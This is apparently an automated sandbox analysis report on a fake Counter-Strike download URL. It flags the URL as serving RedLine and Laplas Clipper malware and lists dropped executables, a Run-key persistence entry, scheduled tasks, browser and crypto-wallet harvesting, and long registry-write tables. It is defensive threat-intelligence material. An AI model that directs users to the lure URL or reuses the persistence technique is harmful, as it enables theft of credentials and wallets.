Analysis Overview
Threat Level: Known bad
The file https://feel-easy.games/catalog/counter-strike-go/ was found to be: Known bad.
Malicious Activity Summary
Laplas Clipper
RedLine
Downloads MZ/PE file
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
GoLang User-Agent
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Creates scheduled task(s)
Views/modifies file attributes
NTFS ADS
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
| Field | Value |
| Reported | 2023-08-01 21:13 |
Signatures
Analysis: behavioral1
Detonation Overview
| Field | Value |
| Submitted | 2023-08-01 21:13 |
| Reported | 2023-08-01 21:16 |
| Platform | win10-20230703-en |
| Max time kernel | 193s |
| Max time network | 196s |
| Command Line | |
Signatures
Laplas Clipper
RedLine
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\conhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| File created | C:\Windows\rescache\_merged\4183903823\810424605.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\1601268389\3877292338.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| File opened for modification | C:\Windows\Debug\ESE.TXT | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "407" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Microsoft Zira Mobile - English (United States)" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\media.net\NumberOfSubdomains = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "51" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "641" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "804" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "409" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "DebugPlugin" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{06405088-BC01-4E08-B392-5303E75090C8}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "002D 002D 0021 0021 0026 0026 002C 002C 002E 002E 003F 003F 005F 005F 002B 002B 002A 002A 02C9 02C9 02CA 02CA 02C7 02C7 02CB 02CB 02D9 02D9 3000 3000 3105 3105 3106 3106 3107 3107 3108 3108 3109 3109 310A 310A 310B 310B 310C 310C 310D 310D 310E 310E 310F 310F 3110 3110 3111 3111 3112 3112 3113 3113 3114 3114 3115 3115 3116 3116 3117 3117 3118 3118 3119 3119 3127 3127 3128 3128 3129 3129 311A 311A 311B 311B 311C 311C 311D 311D 311E 311E 311F 311F 3120 3120 3121 3121 3122 3122 3123 3123 3124 3124 3125 3125 3126 3126" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\mediafire.com | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e2872416bdc4d901 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "1310" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{179F3D56-1B0B-42B2-A962-59B7EF59FE1B}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{E164F996-FF93-4675-BDD8-6C47AB0B86B1}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Program Files\7-Zip\7zG.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "1310" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pubmatic.com\Total = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Near" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "11.0.2013.1022" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = cec7481dbdc4d901 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "SW" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{6BFCACDC-A6A6-4343-9CF6-83A83727367B}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$WordPress | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "769" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ads.pubmatic.com | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "6;18;22" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "6e-1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "289" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Adult" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "397705972" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\mediafire.com | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "971" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
